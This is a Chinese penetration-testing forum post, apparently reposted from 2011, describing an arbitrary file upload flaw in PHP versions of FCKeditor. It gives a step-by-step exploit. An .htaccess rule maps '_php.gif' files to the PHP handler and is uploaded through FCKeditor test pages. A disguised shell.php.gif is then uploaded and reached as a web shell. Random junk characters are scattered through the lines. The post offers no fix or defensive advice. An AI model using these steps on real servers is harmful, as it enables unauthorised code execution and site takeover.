中国网络渗透测试联盟

标题: FCKeditor所有php版本Upload上传漏洞 [打印本页]

作者: admin    时间: 2013-10-27 17:25
标题: FCKeditor所有php版本Upload上传漏洞
FCKeditor所有php版本Upload上传漏洞# C) G, ^1 T1 `, J
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:079 @; g, ^3 _) j, A
减小字体 增大字体
6 x8 {! m( E- S/ F* c9 @5 ?[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
) e# O3 f5 f! o( |6 g3 V[+] Date: 2011
( \; H# N: R7 c  H( i[+] Author : sinesafe.cn
3 P' Z6 _2 f' c' V- P* g! ^: \[+] Website : WwW.sinesafe.cn; d; D* p8 E: z. T. S
———————————————————9 |3 `; i% K4 x1 M* T4 Y
1.create a htaccess file:6 M+ U8 }; v5 o$ K; p' |5 T
code:
: X- ]6 R( a5 a8 G. }, Z<FilesMatch “_php.gif”>" ?" g: ^6 e; N! m+ w
SetHandler application/x-httpd-php
$ }4 S/ F; Q6 [, V! ^# J+ a7 {</FilesMatch>
$ K/ V0 J4 c* M" p5 F$ B3 ?8 X
1 A: ~* G  y3 m' |2 i8 h% s2.Now upload this htaccess with FCKeditor.8 t  X) b! W" w; l
: Q. A4 b4 Q- b) F5 [3 c3 @- S2 d
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html+ ?0 }* m; B! e2 l. T

* v+ @* M- u* b: m& V! qhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
3 }9 w, C. ?9 g/ @0 Z
* r8 G1 d% x1 H5 _———————————————————————————————-
' ^+ O% m5 e' W3 t: B7 B! I3.Now upload shell.php.gif with FCKeditor.
) ?0 ~% B/ R: n: X& x7 w4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
5 T# w' p+ D. R2 I; _4 a& Y. U5.http://www.sinesafe.cn/anything/shell_php.gif  P& z4 g% O) n/ D
6.Now shell is available from server.
$ q  b2 H) A$ w: H% V9 }0 V9 Z

4 f6 a6 j0 [, C* y" w# f& |- E  Q; O; H- V9 f





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2